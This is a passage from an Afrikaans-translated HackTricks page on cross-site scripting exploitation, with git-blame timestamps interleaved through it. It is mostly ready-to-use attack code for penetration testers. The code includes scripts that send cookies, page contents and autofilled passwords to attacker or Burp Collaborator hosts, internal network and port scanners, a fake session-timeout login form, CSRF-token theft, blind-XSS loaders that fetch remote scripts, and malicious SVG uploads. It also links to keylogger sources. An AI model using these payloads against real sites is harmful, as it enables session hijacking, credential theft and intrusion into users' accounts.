< script > eval ( atob ( 'ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp' ) ) ; < / script >
< script > fetch ( 'https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net' , { method : 'POST' , mode : 'no-cors' , body : document . cookie } ) ; < / script >
2020-09-22 09:07:48 +00:00
< script > navigator . sendBeacon ( 'https://ssrftest.com/x/AAAAA' , document . cookie ) < / script >
2020-07-15 15:43:14 +00:00
```
2021-05-27 11:59:23 +00:00
{% hint style="info" %}
2024-09-19 16:41:42 +00:00
Jy **sal nie in staat wees om die koekies vanaf JavaScript te bekom nie** as die HTTPOnly-vlag in die koekie gestel is. Maar hier het jy [sommige maniere om hierdie beskerming te omseil ](../hacking-with-cookies/#httponly ) as jy gelukkig genoeg is.
2021-05-27 11:59:23 +00:00
{% endhint %}
2024-07-19 16:15:11 +00:00
### Steel Bladsy Inhoud
2021-09-01 23:18:05 +00:00
```javascript
var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8";
var attacker = "http://10.10.14.8/exfil";
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
2024-02-11 02:07:06 +00:00
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
2021-09-01 23:18:05 +00:00
}
xhr.open('GET', url, true);
xhr.send(null);
```
2024-02-18 14:51:58 +00:00
### Vind interne IP's
2021-11-26 23:32:24 +00:00
```html
< script >
var q = []
var collaboratorURL = 'http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net';
var wait = 2000
var n_threads = 51
// Prepare the fetchUrl functions to access all the possible
for(i=1;i< =255;i++){
2024-02-11 02:07:06 +00:00
q.push(
function(url){
return function(){
fetchUrl(url, wait);
}
}('http://192.168.0.'+i+':8080'));
2021-11-26 23:32:24 +00:00
}
// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for(i=1; i< =n_threads; i++){
2024-02-11 02:07:06 +00:00
if(q.length) q.shift()();
2021-11-26 23:32:24 +00:00
}
function fetchUrl(url, wait){
2024-02-11 02:07:06 +00:00
console.log(url)
var controller = new AbortController(), signal = controller.signal;
fetch(url, {signal}).then(r=>r.text().then(text=>
{
location = collaboratorURL + '?ip='+url.replace(/^http:\/\//,'')+'& code='+encodeURIComponent(text)+'& '+Date.now()
}
))
.catch(e => {
if(!String(e).includes("The user aborted a request") & & q.length) {
q.shift()();
}
});
2021-11-26 23:32:24 +00:00
2024-02-11 02:07:06 +00:00
setTimeout(x=>{
controller.abort();
if(q.length) {
q.shift()();
}
}, wait);
2021-11-26 23:32:24 +00:00
}
< / script >
```
2024-09-22 16:51:03 +00:00
### Poort Skandeerder (fetch)
2020-07-15 15:43:14 +00:00
```javascript
const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i< 1000 ; i + + ) { checkPort ( i ) ; }
```
2024-07-19 16:15:11 +00:00
### Poort Skandeerder (websockets)
2020-07-15 15:43:14 +00:00
```python
var ports = [80, 443, 445, 554, 3306, 3690, 1234];
for(var i=0; i< ports.length ; i + + ) {
2024-02-11 02:07:06 +00:00
var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
s.start = performance.now();
s.port = ports[i];
s.onerror = function() {
console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
};
s.onopen = function() {
console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
};
2020-07-15 15:43:14 +00:00
}
```
2024-07-19 16:15:11 +00:00
_Short times indicate a responding port_ _Longer times indicate no response._
2020-11-20 10:55:52 +00:00
2024-07-19 16:15:11 +00:00
Kyk na die lys van poorte wat in Chrome verbied is [**hier** ](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net\_util.cc ) en in Firefox [**hier** ](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist ).
2020-07-15 15:43:14 +00:00
2024-09-22 16:51:03 +00:00
### Bokse om vir akrediteerbesonderhede te vra
2020-07-15 15:43:14 +00:00
```markup
< style > :: placeholder { color : white ; } < / style > < script > document . write ( "<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>" ) < / script >
```
2024-07-19 16:15:11 +00:00
### Outomatiese invul van wagwoorde vang
2020-07-15 15:43:14 +00:00
```javascript
< b > Username:< />< br >
< input name = username id = username >
< b > Password:< />< br >
< input type = password name = password onchange = "if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
```
2024-07-19 16:15:11 +00:00
Wanneer enige data in die wagwoordveld ingevoer word, word die gebruikersnaam en wagwoord na die aanvaller se bediener gestuur, selfs al kies die kliënt 'n gestoor wagwoord en skryf niks nie, sal die geloofsbriewe ge-exfiltreer word.
2024-04-06 18:08:38 +00:00
2024-07-19 16:15:11 +00:00
### Keylogger
2021-05-27 13:02:25 +00:00
2024-07-19 16:15:11 +00:00
Net deur in github te soek, het ek 'n paar verskillende gevind:
2021-05-27 13:02:25 +00:00
* [https://github.com/JohnHoder/Javascript-Keylogger ](https://github.com/JohnHoder/Javascript-Keylogger )
* [https://github.com/rajeshmajumdar/keylogger ](https://github.com/rajeshmajumdar/keylogger )
* [https://github.com/hakanonymos/JavascriptKeylogger ](https://github.com/hakanonymos/JavascriptKeylogger )
2024-07-19 16:15:11 +00:00
* Jy kan ook metasploit `http_javascript_keylogger` gebruik
2020-07-15 15:43:14 +00:00
2024-08-18 11:01:35 +00:00
### Stealing CSRF tokens
2020-07-15 15:43:14 +00:00
```javascript
< script >
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
2024-02-11 02:07:06 +00:00
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'& email=test@test.com')
2020-07-15 15:43:14 +00:00
};
< / script >
```
2024-08-18 11:01:35 +00:00
### Steel PostMessage-boodskappe
2020-07-15 15:43:14 +00:00
```markup
< img src = "https://attacker.com/?" id = message >
< script >
2024-02-11 02:07:06 +00:00
window.onmessage = function(e){
document.getElementById("message").src += "&"+e.data;
2020-07-15 15:43:14 +00:00
< / script >
```
2024-02-18 14:51:58 +00:00
### Misbruik van Dienswerkers
2020-07-15 15:43:14 +00:00
2022-12-20 11:25:07 +00:00
{% content-ref url="abusing-service-workers.md" %}
[abusing-service-workers.md ](abusing-service-workers.md )
{% endcontent-ref %}
2021-10-20 00:45:58 +00:00
2024-07-19 16:15:11 +00:00
### Toegang tot Skadu DOM
2023-08-16 08:24:17 +00:00
{% content-ref url="shadow-dom.md" %}
[shadow-dom.md ](shadow-dom.md )
{% endcontent-ref %}
2024-07-19 16:15:11 +00:00
### Polyglotte
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt" %}
2020-07-15 15:43:14 +00:00
2024-09-18 16:23:15 +00:00
### Blinde XSS payloads
2021-10-08 09:38:39 +00:00
2024-02-11 02:07:06 +00:00
Jy kan ook gebruik maak van: [https://xsshunter.com/ ](https://xsshunter.com )
2020-07-15 15:43:14 +00:00
```markup
">< img src = '//domain/xss' >
">< script src = "//domain/xss.js" > < / script >
>< a href = "javascript:eval('d=document; _ = d.createElement(\'script\');_ .src= \'//domain \';d.body.appendChild(_)')" > Click Me For An Awesome Time</ a >
2020-07-30 22:31:02 +00:00
< script > function b ( ) { eval ( this . responseText ) } ; a = new XMLHttpRequest ( ) ; a . addEventListener ( "load" , b ) ; a . open ( "GET" , "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb" ) ; a . send ( ) ; < / script >
2020-07-15 15:43:14 +00:00
<!-- html5sec - Self - executing focus event via autofocus: -->
">< input onfocus = "eval('d=document; _ = d.createElement(\'script\');_ .src= \'\/\/domain/m \';d.body.appendChild(_)')" autofocus >
<!-- html5sec - JavaScript execution via iframe and onload -->
2024-02-11 02:07:06 +00:00
">< iframe onload = "eval('d=document; _=d.createElement(\'script\');_ .src= \'\/\/domain/m \';d.body.appendChild(_)')" >
2020-07-15 15:43:14 +00:00
<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
">< svg onload = "javascript:eval('d=document; _ = d.createElement(\'script\');_ .src= \'//domain \';d.body.appendChild(_)')" xmlns = "http://www.w3.org/2000/svg" ></ svg >
<!-- html5sec - allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags -->
">< video >< source onerror = "eval('d=document; _ = d.createElement(\'script\');_ .src= \'//domain \';d.body.appendChild(_)')" >
<!-- html5sec - eventhandler - element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known. -->
">< body onpageshow = "eval('d=document; _ = d.createElement(\'script\');_ .src= \'//domain \';d.body.appendChild(_)')" >
<!-- xsshunter.com - Sites that use JQuery -->
< script > $ . getScript ( "//domain" ) < / script >
<!-- xsshunter.com - When <script> is filtered -->
">< img src = x id = payload== onerror = eval(atob(this.id)) >
<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
">< input onfocus = eval(atob(this.id)) id = payload== autofocus >
2020-07-30 22:31:02 +00:00
<!-- noscript trick -->
< noscript > < p title = "</noscript><img src=x onerror=alert(1)>" >
2020-07-15 15:43:14 +00:00
<!-- whitelisted CDNs in CSP -->
">< script src = "https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js" > < / script >
< script src = "https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js" > < / script >
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration : - ]... -->
< div ng-app ng-csp > < textarea autofocus ng-focus = "d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'" > < / textarea > < / div >
```
2024-07-19 16:15:11 +00:00
### Regex - Toegang tot Verborgen Inhoud
2020-07-15 15:43:14 +00:00
2024-09-22 16:51:03 +00:00
Van [**hierdie skrywe** ](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay ) is dit moontlik om te leer dat selfs al verdwyn sommige waardes uit JS, dit steeds moontlik is om hulle in JS-attribuut in verskillende objekte te vind. Byvoorbeeld, 'n invoer van 'n REGEX is steeds moontlik om dit te vind nadat die waarde van die invoer van die regex verwyder is:
2023-01-12 12:36:15 +00:00
```javascript
// Do regex with flag
flag="CTF{FLAG}"
re=/./g
re.test(flag);
// Remove flag value, nobody will be able to get it, right?
flag=""
// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"])
```
2024-07-19 16:15:11 +00:00
### Brute-Force Lys
2021-06-27 21:56:13 +00:00
2021-10-18 11:21:18 +00:00
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt" %}
2021-06-27 21:56:13 +00:00
2024-02-11 02:07:06 +00:00
## XSS Misbruik van ander kwesbaarhede
2020-07-15 15:43:14 +00:00
2022-05-01 16:57:45 +00:00
### XSS in Markdown
2021-11-29 10:15:51 +00:00
2024-07-19 16:15:11 +00:00
Kan Markdown kode ingesluit word wat gerender sal word? Miskien kan jy XSS kry! Kontroleer:
2022-05-05 23:53:10 +00:00
{% content-ref url="xss-in-markdown.md" %}
[xss-in-markdown.md ](xss-in-markdown.md )
{% endcontent-ref %}
2021-11-29 10:15:51 +00:00
2024-02-11 02:07:06 +00:00
### XSS na SSRF
2020-09-09 09:02:24 +00:00
2024-07-19 16:15:11 +00:00
Het jy XSS op 'n **webwerf wat caching gebruik** ? Probeer **dit opgradeer na SSRF** deur Edge Side Include Injection met hierdie payload:
2020-09-09 09:02:24 +00:00
```python
< esi:include src = "http://yoursite.com/capture" / >
```
2024-07-19 16:15:11 +00:00
Gebruik dit om koekie-beperkings, XSS-filters en nog baie meer te omseil!\
2024-02-11 02:07:06 +00:00
Meer inligting oor hierdie tegniek hier: [**XSLT** ](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md ).
2020-09-09 09:02:24 +00:00
2024-07-19 16:15:11 +00:00
### XSS in dinamies geskepte PDF
2020-07-15 15:43:14 +00:00
2024-09-19 16:41:42 +00:00
As 'n webblad 'n PDF skep met behulp van gebruikersbeheerde invoer, kan jy probeer om die **bot** wat die PDF skep te **mislei** om **arbitraire JS-kode** te **uit te voer** .\
2024-07-19 16:15:11 +00:00
As die **PDF-skeppende bot** 'n soort **HTML** **tags** vind, gaan dit dit **interpreteer** , en jy kan hierdie gedrag **misbruik** om 'n **Server XSS** te veroorsaak.
2020-12-24 09:46:40 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="server-side-xss-dynamic-pdf.md" %}
[server-side-xss-dynamic-pdf.md ](server-side-xss-dynamic-pdf.md )
{% endcontent-ref %}
2020-12-24 09:46:40 +00:00
2024-07-19 16:15:11 +00:00
As jy nie HTML-tags kan inspuit nie, kan dit die moeite werd wees om te probeer om **PDF-data** te **inspuit** :
2020-12-24 09:46:40 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="pdf-injection.md" %}
[pdf-injection.md ](pdf-injection.md )
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2022-08-16 09:38:59 +00:00
### XSS in Amp4Email
2024-09-16 20:57:57 +00:00
AMP, wat daarop gemik is om die webbladprestasie op mobiele toestelle te versnel, sluit HTML-tags in wat aangevul word deur JavaScript om funksionaliteit te verseker met 'n fokus op spoed en sekuriteit. Dit ondersteun 'n reeks komponente vir verskeie funksies, toeganklik via [AMP-komponente ](https://amp.dev/documentation/components/?format=websites ).
2022-08-16 09:38:59 +00:00
2024-07-19 16:15:11 +00:00
Die [**AMP vir E-pos** ](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/ ) formaat brei spesifieke AMP-komponente uit na e-posse, wat ontvangers in staat stel om direk met inhoud binne hul e-posse te interaksie.
2022-08-16 09:38:59 +00:00
2024-07-19 16:15:11 +00:00
Voorbeeld [**skrywe XSS in Amp4Email in Gmail** ](https://adico.me/post/xss-in-gmail-s-amp4email ).
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
### XSS om lêers op te laai (svg)
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
Laai 'n lêer soos die volgende op as 'n beeld (van [http://ghostlulz.com/xss-svg/ ](http://ghostlulz.com/xss-svg/ )):
2020-07-15 15:43:14 +00:00
```markup
Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml
2021-04-12 14:09:57 +00:00
2020-07-15 15:43:14 +00:00
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
< svg version = "1.1" baseProfile = "full" xmlns = "http://www.w3.org/2000/svg" >
2024-02-11 02:07:06 +00:00
< rect width = "300" height = "100" style = "fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" / >
< script type = "text/javascript" >
alert(1);
< / script >
2020-07-15 15:43:14 +00:00
< / svg >
-----------------------------232181429808--
```
2021-06-15 09:31:42 +00:00
```markup
2020-07-15 15:43:14 +00:00
< svg version = "1.1" baseProfile = "full" xmlns = "http://www.w3.org/2000/svg" >
2024-02-11 02:07:06 +00:00
< script type = "text/javascript" > alert ( "XSS" ) < / script >
2020-07-15 15:43:14 +00:00
< / svg >
```
2021-06-15 09:31:42 +00:00
```markup
2021-01-22 11:00:52 +00:00
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
< svg version = "1.1" baseProfile = "full" xmlns = "http://www.w3.org/2000/svg" >
< polygon id = "triangle" points = "0,0 0,50 50,0" fill = "#009900" stroke = "#004400" / >
< script type = "text/javascript" >
alert("XSS");
< / script >
< / svg >
```
2022-04-30 10:09:20 +00:00
```svg
< svg width = "500" height = "500"
2024-02-11 02:07:06 +00:00
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
< circle cx = "50" cy = "50" r = "45" fill = "green"
id="foo"/>
< foreignObject width = "500" height = "500" >
< iframe xmlns = "http://www.w3.org/1999/xhtml" src = "data:text/html,<body><script>document.body.style.background="red"</script>hi</body>" width = "400" height = "250" / >
< iframe xmlns = "http://www.w3.org/1999/xhtml" src = "javascript:document.write('hi');" width = "400" height = "250" / >
< / foreignObject >
2022-06-25 15:45:47 +00:00
< / svg >
2022-04-30 10:09:20 +00:00
```
2022-07-20 09:38:23 +00:00
```html
< svg > < use href = "//portswigger-labs.net/use_element/upload.php#x" / > < / svg >
```
2023-03-03 17:26:17 +00:00
```xml
< svg > < use href = "data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' ><image href='1' onerror='alert(1)' /></svg>#x" / >
```
2024-07-19 16:15:11 +00:00
Find **meer SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet** ](https://github.com/allanlw/svg-cheatsheet )
2023-03-03 17:26:17 +00:00
2024-09-18 16:23:15 +00:00
## Verskeie JS Triks & Relevante Inligting
2020-07-15 15:43:14 +00:00
2023-02-07 10:56:16 +00:00
{% content-ref url="other-js-tricks.md" %}
[other-js-tricks.md ](other-js-tricks.md )
{% endcontent-ref %}
2024-07-19 16:15:11 +00:00
## XSS hulpbronne
2023-01-05 13:05:03 +00:00
2023-02-07 10:56:16 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection )
2023-03-05 22:20:47 +00:00
* [http://www.xss-payloads.com ](http://www.xss-payloads.com ) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt ](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt ) [https://github.com/materaj/xss-list ](https://github.com/materaj/xss-list )
* [https://github.com/ismailtasdelen/xss-payload-list ](https://github.com/ismailtasdelen/xss-payload-list )
2023-02-07 10:56:16 +00:00
* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec ](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec )
2023-01-05 13:05:03 +00:00
* [https://netsec.expert/2020/02/01/xss-in-2020.html ](https://netsec.expert/2020/02/01/xss-in-2020.html )
2020-07-15 15:43:14 +00:00
2024-09-22 16:51:03 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-04-28 16:01:33 +00:00
2024-09-19 16:41:42 +00:00
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_vloeiend Pools geskryf en gesproke vereis_).
2022-05-08 22:42:39 +00:00
2024-02-18 14:51:58 +00:00
{% embed url="https://www.stmcyber.com/careers" %}
2022-05-08 22:42:39 +00:00
2024-07-19 16:15:11 +00:00
{% hint style="success" %}
2024-09-19 16:41:42 +00:00
Learn & practice AWS Hacking:< img src = "../../.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "../../.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "../../.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "../../.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:15:11 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-09-19 16:41:42 +00:00
< summary > Support HackTricks< / summary >
2024-01-01 17:15:42 +00:00
2024-09-19 16:41:42 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:15:11 +00:00
{% endhint %}